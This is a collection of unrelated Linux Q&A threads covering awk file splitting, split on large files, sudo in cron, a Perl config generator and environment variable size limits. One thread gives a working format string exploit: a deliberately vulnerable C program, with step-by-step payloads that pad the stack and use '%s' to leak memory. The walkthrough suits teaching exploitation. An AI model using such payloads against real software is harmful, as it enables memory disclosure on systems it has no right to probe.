Problems with a text-splitting script

I want to split one big text document (.txt) into multiple ones. The document is a collection of debates in the Spanish parliament. The text is divided into policy initiatives (I'm not sure if that is idiomatic), and I want to split it into one document per initiative. Conveniently, each initiative has its own title in the following form:
- DEL GRUPO PARLAMENTARIO CATALÁN (CONVERGÈNCIA I UNIÓ), REGULADORA DE LOS HORARIOS COMERCIALES. (Número de expediente 122/000004.)
- DEL DIPUTADO DON MARIANO RAJOY BREY, DEL GRUPO PARLAMENTARIO POPULAR EN EL CONGRESO, QUE FORMULA AL SEÑOR PRESIDENTE DEL GOBIERNO: ¿CÓMO VALORA USTED LOS PRIMEROS DÍAS DE SU GOBIERNO? (Número de expediente 180/000021.)
As you can see, every title is in upper case, starts with a hyphen, and ends with "XXX/XXXXXX.)" (where X is a digit), that is, a dot followed by a closing parenthesis. No two titles are the same. I have thought of writing a regular expression that captures those characteristics, so that the titles can act as delimiters between debates.
Ideally, I would select each title and the debate below it, up to the next title, and write that to a new document, so that each output file holds one policy initiative with its title and its own debate. Thanks to this community I got the following script:
awk '/^-.+[0-9]{3}\/[0-9]{6}\.\)$/ {
if (p) close (p)
p = sprintf("split%05i.txt", ++i) }
{ if (p) print > "p" }' inputfile.txt
But when I run it (with Cygwin on Windows 10) nothing happens. I thought it was due to a Windows configuration problem or something similar, but I just tried it in an Ubuntu VM and the same thing happens, i.e., nothing:
$ ls -l
total 228
-rw-rw-r-- 1 ubuntu ubuntu 219166 Jan 30 11:28 tryme.txt
-rwxr-xr-x 1 ubuntu ubuntu 8259 Jan 30 11:24 ubiquity.desktop
$ awk '/^-.+[0-9]{3}\/[0-9]{6}\.\)$/ {
if (p) close (p)
p = sprintf("split%05i.txt", ++i) }
{ if (p) print > "p" }' tryme.txt
$ ls -l
total 228
-rw-rw-r-- 1 ubuntu ubuntu 219166 Jan 30 11:28 tryme.txt
-rwxr-xr-x 1 ubuntu ubuntu 8259 Jan 30 11:24 ubiquity.desktop
Any idea about what is happening here? Thank you very much.
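For comparison, here is a minimal Python sketch of the same splitting logic. It is not the awk fix itself, and the function names are made up for illustration. Two things may be worth checking in the awk version: print > "p" writes to a file literally named p rather than to the file named by the variable p, and some awk implementations do not support the {3} interval syntax. The sketch also tolerates a trailing carriage return, in case the input has Windows line endings (an assumption, the question does not say).

```python
import re

# Title lines: start with "-" and end with "ddd/dddddd.)".
# A stray "\r" from Windows line endings is tolerated at the end.
TITLE_RE = re.compile(r"^-.+[0-9]{3}/[0-9]{6}\.\)\r?$")


def split_initiatives(lines):
    """Group lines into chunks, starting a new chunk at each title line.

    Lines before the first title are dropped, as in the awk script.
    """
    chunks = []
    for line in lines:
        if TITLE_RE.match(line.rstrip("\n")):
            chunks.append([])
        if chunks:
            chunks[-1].append(line)
    return chunks


def write_chunks(chunks, pattern="split{:05d}.txt"):
    """Write each chunk to its own file (split00001.txt, split00002.txt, ...)."""
    for number, chunk in enumerate(chunks, start=1):
        with open(pattern.format(number), "w", encoding="utf-8") as out:
            out.writelines(chunk)


sample = [
    "preamble\n",
    "- DEL GRUPO PARLAMENTARIO CATALÁN (CONVERGÈNCIA I UNIÓ), REGULADORA DE "
    "LOS HORARIOS COMERCIALES. (Número de expediente 122/000004.)\n",
    "first debate\n",
    "- DEL DIPUTADO DON MARIANO RAJOY BREY, DEL GRUPO PARLAMENTARIO POPULAR EN "
    "EL CONGRESO, QUE FORMULA AL SEÑOR PRESIDENTE DEL GOBIERNO: ¿CÓMO VALORA "
    "USTED LOS PRIMEROS DÍAS DE SU GOBIERNO? (Número de expediente 180/000021.)\r\n",
    "second debate\n",
]
chunks = split_initiatives(sample)
print(len(chunks))  # 2
```

Calling write_chunks(chunks) would then create one file per initiative in the current directory.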

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web; however, the examples I've found only cover 32-bit Linux, and my desktop runs 64-bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that, I set my test variable and get its address. Then I pass the address to the program as a parameter, followed by a series of format specifiers to read values from the stack:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
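The stray 3125 can be reproduced with a small Python sketch. It assumes a little-endian x86-64 machine, where printf reads the stack in 8-byte words; the helper name as_stack_word is made up for illustration. The address only occupies 6 bytes, so the next two bytes of the argument ('%' = 0x25 and '1' = 0x31) end up in the top of the same word.

```python
import struct

ADDRESS = b"\xcb\xef\xff\xff\xff\x7f"  # 0x7fffffffefcb, low byte first


def as_stack_word(payload):
    """Interpret the first 8 bytes of payload as a little-endian 64-bit word."""
    return struct.unpack("<Q", payload[:8])[0]


# Address immediately followed by the format string "%10$16lx"
print(hex(as_stack_word(ADDRESS + b"%10$16lx")))  # 0x31257fffffffefcb
# Address followed by two NUL bytes, which is what "%s" would need
print(hex(as_stack_word(ADDRESS + b"\x00\x00")))  # 0x7fffffffefcb
```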
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter what I tried, putting the address before the format specifiers always got the two mixed up, so I moved the address to the end and added some padding of my own, so that I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of the python one-liner and printf (with an extra '%' because of the way the outer printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whatever).
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, the next step is to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' won't work, because the extra padding is needed. So I add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.
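The padding arithmetic in this answer can be checked with a short Python sketch. It assumes that the buffer starts on an 8-byte boundary and that each specifier consumes one 8-byte word, which is consistent with the output shown but not stated in the answer. The helper name address_misalignment is made up for illustration.

```python
WORD = 8  # bytes consumed per %lx argument on x86-64


def address_misalignment(format_part, padding):
    """Bytes by which the appended address misses an 8-byte boundary.

    Assumes the buffer itself starts on an 8-byte boundary.
    """
    return (len(format_part) + len(padding)) % WORD


hex_formats = "%016lx|" * 110
print(address_misalignment(hex_formats, "-" * 8))    # 2
print(address_misalignment(hex_formats, "-" * 30))   # 0

# '||||%s|' has the same length as '%016lx|', so alignment is preserved
leak_formats = "%016lx|" * 109 + "||||%s|"
print(len(leak_formats) == len(hex_formats))         # True
print(address_misalignment(leak_formats, "-" * 30))  # 0
```

With 8 dashes the address starts 2 bytes into a word, which matches the 7fffffffefcb2d2d value in the first dump; with 30 dashes it lands exactly on a word boundary.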

Why does the Linux split program behave strangely with large files (>20GB)?

I'm running the following command on my Ubuntu machine:
split --number=l/5 /pathToSource.csv /pathToOutputDirectory
If I run "ls":
myUser@serverNAme:/pathToOutputDirectory> ls -la
total 21467452
drwxr-xr-x 2 myUser group 4096 Jun 23 08:51 .
drwxrwxrwx 4 myUser group 4096 Jun 23 08:44 ..
-rw-r--r-- 1 myUser group 10353843231 Jun 23 08:48 aa
-rw-r--r-- 1 myUser group 0 Jun 23 08:48 ab
-rw-r--r-- 1 myUser group 11376663825 Jun 23 08:51 ac
-rw-r--r-- 1 myUser group 0 Jun 23 08:51 ad
-rw-r--r-- 1 myUser group 252141913 Jun 23 08:51 ae
If I run "du" on the ab and ad files:
$du -h ab ad
0 ab
0 ad
As you can see, split divided the file unevenly.
Does anyone know what's going on?
Could some unprintable character trip up split?
Thank you.
Best Regards!
Francisco.
While this is unusual data, with an average line length of 114137, I'm not sure that fully explains the issue. You have 21982648969 bytes of data, so each bucket that split is trying to fill is 4396529793 bytes. That's larger than 2^32, so I wonder whether we have a 32-bit overflow. Are you on a 32-bit or 64-bit platform? Looking at the code I don't see an overflow issue, to be honest. Note that you could anonymize and compress the data and provide the resulting file for download somewhere:
tr -c '\n' . < /pathToSource.csv | xz > /pathToSource.csv.xz
It's also worth specifying the version, since the implementation changed a bit between v8.8 and v8.13.
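The numbers in this comment can be re-derived from the ls listing with a few lines of Python. This is only an arithmetic check, not a diagnosis. The last loop prints where each non-empty output file ends, measured in buckets. Whether very long lines spanning bucket boundaries account for the empty files is a guess that the thread does not confirm.

```python
# File sizes taken from the "ls -la" output in the question
sizes = {"aa": 10353843231, "ab": 0, "ac": 11376663825, "ad": 0, "ae": 252141913}

total = sum(sizes.values())
bucket = total // 5  # target size per chunk for --number=l/5

print(total)             # 21982648969
print(bucket)            # 4396529793
print(bucket > 2 ** 32)  # True

# End offset of each non-empty file, in units of the bucket size
offset = 0
for name, size in sizes.items():
    offset += size
    if size:
        print(name, round(offset / bucket, 2))
```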
A workaround in Groovy:
class Sanitizer {
public static void main(String[] args) {
def textOnly = new File('/path/NoDanger.txt')
def data = new File('/path/danger.txt')
String line = null
data.withReader { reader ->
while ( ( line = reader.readLine() ) != null ){
/*char[] stringToCharArray = line.toCharArray();
for(int i = 0; i < 5; i++ ){
char a = stringToCharArray[i]
int b = Character.getNumericValue(a);
println Integer.toHexString(b)
if (!(b =~ /\w/)) {
println "inside"
} else println "outside"
}*/
String newString = line.replaceAll("[^\\p{Print}]", "");
textOnly << newString+"\n"
}
} //reader
}
}
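A rough Python equivalent of the replaceAll call above, as a sketch. In Java, \p{Print} covers printable ASCII by default, so the character class below (space through tilde) is meant to match it. The name sanitize_line is made up for illustration. Note that this also strips tabs and any non-ASCII letters, which may or may not be acceptable for the CSV in question.

```python
import re

# Anything outside printable ASCII (0x20 space through 0x7e tilde)
NON_PRINTABLE = re.compile(r"[^\x20-\x7e]")


def sanitize_line(line):
    """Remove every character outside printable ASCII."""
    return NON_PRINTABLE.sub("", line)


print(sanitize_line("id;na\x00me;\x07value"))  # id;name;value
print(sanitize_line("caf\u00e9\tau lait"))     # cafau lait
```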

Bash script not producing desired result

I am running a cron-ed bash script to extract cache hits and bytes served per IP address. The script (ProxyUsage.bash) has two parts:
(uniqueIP.awk) find unique IPs and create a bash script to add up the hits and bytes
run the hits and bytes per IP
ProxyUsage.bash
#!/usr/bin/env bash
sudo gawk -f /home/maxg/scripts/uniqueIP.awk /var/log/squid3/access.log.1 > /home/maxg/scripts/pxyUsage.bash
source /home/maxg/scripts/pxyUsage.bash
uniqueIP.awk
{
arrIPs[$3]++;
}
END {
for (n in arrIPs) {
m++; # count arrIPs elements
#print "Array elements: " m;
arrAddr[i++] = n; # fill arrAddr with IPs
#print i " " n;
}
asort(arrAddr); # sort the array values
for (i = 1; i <= m; i++) { # write one command line per IP address
#printf("#!/usr/bin/env bash\n");
printf("sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=%s /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt\n", arrAddr[i])
}
}
pxyUsage.bash
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.13 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.14 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
sudo gawk -f /home/maxg/scripts/proxyUsage.awk -v v_Var=192.168.1.22 /var/log/squid3/access.log.1 >> /home/maxg/scripts/pxyUsage.txt
The ProxyUsage.bash script runs as scheduled and creates the pxyUsage.bash script.
However, the pxyUsage.txt file is not updated with the latest values when the script runs.
So far I have been running pxyUsage.bash myself every day, as I cannot figure out why the result is not written to the file.
Both bash scripts are set to execute. Actually the file permissions are below:
-rwxr-xr-x 1 maxg maxg 169 Mar 14 08:40 ProxySummary.bash
-rw-r--r-- 1 maxg maxg 910 Mar 15 17:15 proxyUsage.awk
-rwxrwxrwx 1 maxg maxg 399 Mar 17 06:10 pxyUsage.bash
-rw-rw-rw- 1 maxg maxg 2922 Mar 17 07:32 pxyUsage.txt
-rw-r--r-- 1 maxg maxg 781 Mar 16 07:35 uniqueIP.awk
Any hints appreciated. Thanks.
The sudo(8) command requires a pseudo-tty and you do not have one allocated under cron(8); you do have one allocated when logged in the usual way.
Instead of mucking about with sudo(8), just run the script as the correct user.
If you cannot do that, then in the root crontab, do something like this:
su - username /path/to/mycommand arg1 arg2...
This will work because root can use su(1) without needing a password.

Linux Bash - read the contents of a file, store them in a variable and create a network config file

I have a file1.csv file which contains a lot of network interface data (approx. 1000 entries), and I have to create the network interface files from it, as in ifcfg-lo:x files.
The contents of file1.csv are as follows:
Hostname Loop_back_ip netmask interface
localhost1 192.168.1.10 255.255.255.255 lo:116
So the script should read the contents of file1.csv and create an interface file like this:
file name = ifcfg-lo:116
File contents :
DEVICE=lo:116
IPADDR=192.168.1.10
NETMASK=255.255.255.255
NETWORK=192.168.1.0
BROADCAST=255.255.255.255
ONBOOT=yes
NAME=loopback
I tried yesterday and I am very close to the solution. After researching on the internet, I wrote a Perl script and was able to create multiple interface files by extracting the data from the CSV file.
But there is one small issue: I cannot figure out why an extra character ends up in the files.
Here is the code:
#!/usr/bin/perl
use strict;
use warnings;
sub main
{
# Note: this could be a full file path
my $filename = "file1.csv";
open(INPUT, $filename) or die "Cannot open $filename";
# Read the header line.
#my $line = <INPUT>;
my $line;
# Read the lines one by one.
while($line = <INPUT>)
{
chomp($line);
# Display the header, just to check things are working.
my ($hostname, $ip, $netmask, $interface) = split(',', $line);
print "$hostname $ip $netmask $interface\n";
{
if( -d "/var/tmp/$hostname")
{
open(EF, ">/var/tmp/$hostname/ifcfg-$interface") or die "writing /var/tmp/$hostname/ifcfg-$interface\n";
print EF "DEVICE=$interface\n";
print EF "IPADDR=$ip\n";
print EF "NETMASK=$netmask\n";
print EF "NAME=loopback\n";
print EF "BOOTPROTO=none\n";
print EF "TYPE=Ethernet\n";
print EF "ONBOOT=yes\n";
close EF;
}
else
{
system ("mkdir /var/tmp/$hostname");
open(EF, ">/var/tmp/$hostname/ifcfg-$interface") or die "writing /var/tmp/$hostname/ifcfg-$interface\n";
print EF "DEVICE=$interface\n";
print EF "IPADDR=$ip\n";
print EF "NETMASK=$netmask\n";
print EF "NAME=loopback\n";
print EF "BOOTPROTO=none\n";
print EF "TYPE=Ethernet\n";
print EF "ONBOOT=yes\n";
close EF;
}
}
}
close(INPUT);
}
main();
After executing the script, it creates the files as follows:
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:20
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:21
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:22
-rw-r--r-- 1 root root 112 Jul 24 10:09 ifcfg-lo:23
When I "cat" a file to display it, it shows no issues:
$> cat ifcfg-lo:20
DEVICE=lo:20
IPADDR=A.B.C.D
NETMASK=255.255.255.255
NAME=loopback
BOOTPROTO=none
TYPE=Ethernet
ONBOOT=yes
But when I open the file in "vi", I see an extra character (^M). I am not able to figure out where it comes from, and it is in every file I created:
$> vi ifcfg-lo:20
DEVICE=lo:20^M
IPADDR=A.B.C.D
NETMASK=255.255.255.255
NAME=loopback
BOOTPROTO=none
TYPE=Ethernet
ONBOOT=yes
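^M is how vi displays a carriage return. A likely explanation, assuming file1.csv was saved with Windows (CRLF) line endings, is that removing only the trailing newline leaves the carriage return attached to the last field, which is the interface name. That would explain why it shows up on the DEVICE line only. A minimal Python sketch of the effect follows. It assumes comma-separated rows, as the split(',') in the script implies, and parse_row is a made-up name.

```python
def parse_row(line):
    """Split one CSV row after dropping any trailing CR and LF characters."""
    hostname, ip, netmask, interface = line.rstrip("\r\n").split(",")
    return hostname, ip, netmask, interface


crlf_row = "localhost1,192.168.1.10,255.255.255.255,lo:20\r\n"

# Removing only the newline keeps the carriage return on the last field
print(repr(crlf_row.rstrip("\n").split(",")[-1]))  # 'lo:20\r'
# Removing both gives a clean interface name
print(repr(parse_row(crlf_row)[-1]))               # 'lo:20'
```

In the Perl script, the analogous change would be to strip a trailing carriage return from each line in addition to chomp, or to convert the CSV to Unix line endings first.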

What is the maximum size of a Linux environment variable value?

Is there a limit to the amount of data that can be stored in an environment variable on Linux, and if so: what is it?
For Windows, I found the following KB article, which summarizes the limits as:
Windows XP or later: 8191 characters
Windows 2000/NT 4.0: 2047 characters
I don't think there is a per-environment-variable limit on Linux. The total size of all the environment variables put together is limited at execve() time. See "Limits on size of arguments and environment" in the execve(2) man page for more information.
A process may use setenv() or putenv() to grow the environment beyond the initial space allocated by exec.
Here's a quick and dirty program that creates a 256 MB environment variable.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
size_t size = 1 << 28; /* 256 MB */
char *var;
var = malloc(size);
if (var == NULL) {
perror("malloc");
return 1;
}
memset(var, 'X', size);
var[size - 1] = '\0';
var[0] = 'A';
var[1] = '=';
if (putenv(var) != 0) {
perror("putenv");
return 1;
}
/* Demonstrate E2BIG failure explained by paxdiablo */
execl("/bin/true", "true", (char *)NULL);
perror("execl");
printf("A=%s\n", getenv("A"));
return 0;
}
Well, it's at least 4M on my box. At that point, I got bored and wandered off. Hopefully the terminal output will be finished before I'm back at work on Monday :-)
export b1=A
export b2=$b1$b1
export b4=$b2$b2
export b8=$b4$b4
export b16=$b8$b8
export b32=$b16$b16
export b64=$b32$b32
export b128=$b64$b64
export b256=$b128$b128
export b512=$b256$b256
export b1k=$b512$b512
export b2k=$b1k$b1k
export b4k=$b2k$b2k
export b8k=$b4k$b4k
export b16k=$b8k$b8k
export b32k=$b16k$b16k
export b64k=$b32k$b32k
export b128k=$b64k$b64k
export b256k=$b128k$b128k
export b512k=$b256k$b256k
export b1m=$b512k$b512k
export b2m=$b1m$b1m
export b4m=$b2m$b2m
echo $b4m
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
: : : : : : : : : : : :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
If you're worried that 4M may not be enough for your environment variable, you may want to rethink how you're doing things.
Perhaps it would be a better idea to put the information into a file and then use an environment variable to reference that file. I've seen cases where, if the variable is of the form @/path/to/any/fspec, it gets the actual information from the file path/to/any/fspec. If it doesn't begin with @, it uses the value of the environment variable itself.
Interestingly enough, with all those variables set, every single command starts complaining that the argument list is too long so, even though it lets you set them, it may not be able to start programs after you've done it (since it has to pass the environment to those programs).
Here are two helpful commands:
getconf -a | grep ARG_MAX
true | xargs --show-limits
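The same limit can be read from Python, as a rough sketch. os.sysconf("SC_ARG_MAX") returns the value that getconf reports as ARG_MAX. The size estimate for the current environment is only approximate, since the kernel's own accounting includes more than the strings themselves.

```python
import os

# Total space available for argv plus the environment at exec time (bytes)
arg_max = os.sysconf("SC_ARG_MAX")

# Approximate bytes used by the current environment: each entry is stored
# as "NAME=value" plus a terminating NUL byte
env_bytes = sum(
    len(os.fsencode(name)) + 1 + len(os.fsencode(value)) + 1
    for name, value in os.environ.items()
)

print(f"ARG_MAX: {arg_max} bytes")
print(f"current environment: about {env_bytes} bytes")
```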
I did a quick test on my Linux box with the following snippet:
a="1"
while true
do
a=$a$a
echo "$(date) $(numfmt --to=iec-i --suffix=B --padding=7 ${#a})"
done
On my box (Gentoo 3.17.8-gentoo-r1) this results in (last lines of output):
Wed Jan 3 12:16:10 CET 2018 16MiB
Wed Jan 3 12:16:11 CET 2018 32MiB
Wed Jan 3 12:16:12 CET 2018 64MiB
Wed Jan 3 12:16:15 CET 2018 128MiB
Wed Jan 3 12:16:21 CET 2018 256MiB
Wed Jan 3 12:16:33 CET 2018 512MiB
xrealloc: cannot allocate 18446744071562068096 bytes
So: the limit is quite high!
Don't know exactly but a quick experiment shows that no error occurs e.g. with 64kB of value:
% perl -e 'print "#include <stdlib.h>\nint main() { return setenv(\"FOO\", \"", "x"x65536, "\", 1); }\n";'\
| gcc -x c -o envtest - && ./envtest && echo $?
0
I used this very quick and dirty php code (below), modifying it for different values, and found that it works for variable lengths up to 128k. After that, for whatever reason, it doesn't work; no exception is raised, no error is reported, but the value does not show up in the subshell.
Maybe this is a php-specific limit? Maybe there are php.ini settings that might affect it? Or maybe there's a limit on the size of vars that a subshell will inherit? Maybe there are relevant kernel or shell config settings..
Anyway, by default, in CentOS, the limit for setting a var in the environment via putenv in php seems to be about 128k.
<?php
$s = 'abcdefghijklmnop';
$s2 = "";
for ($i = 0; $i < 8100; $i++) $s2 .= $s;
$result = putenv('FOO='.$s2);
print shell_exec('echo \'FOO: \'${FOO}');
print "length of s2: ".strlen($s2)."\n";
print "result = $result\n";
?>
Version info -
[root@localhost scratch]# php --version
PHP 5.2.6 (cli) (built: Dec 2 2008 16:32:08)
<..snip..>
[root@localhost scratch]# uname -a
Linux localhost.localdomain 2.6.18-128.2.1.el5 #1 SMP Tue Jul 14 06:36:37 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost scratch]# cat /etc/redhat-release
CentOS release 5.3 (Final)
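One way to probe whether a child process can inherit a variable of a given size, independent of PHP, is to try starting one. The following is a minimal Python sketch. BIGVAR and the function name are made up for illustration, and the sizes at which exec starts failing depend on the kernel, so the output is not shown here. On Linux, the execve(2) man page describes a per-string limit (MAX_ARG_STRLEN, 32 pages) in addition to the total limit, which may be related to the roughly 128k threshold observed above.

```python
import os
import subprocess
import sys


def child_starts_with_env_value(size):
    """Return True if a child process can be started with a size-byte variable."""
    env = dict(os.environ, BIGVAR="X" * size)  # BIGVAR is a hypothetical name
    try:
        subprocess.run([sys.executable, "-c", "pass"], env=env, check=True)
        return True
    except OSError as exc:
        # On Linux an oversized string typically fails with "Argument list too long"
        print(f"{size} bytes: exec failed ({exc.strerror})")
        return False


for size in (64 * 1024, 256 * 1024):
    print(size, child_starts_with_env_value(size))
```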
The command line (with all arguments) plus the environment variables should be less than 128k.
In my case the cause was that the input buffer is limited when accepting a value with the read command. The solution was to add -e:
Before: read accessToken
After: read -e accessToken
Docs: http://linuxcommand.org/lc3_man_pages/readh.html
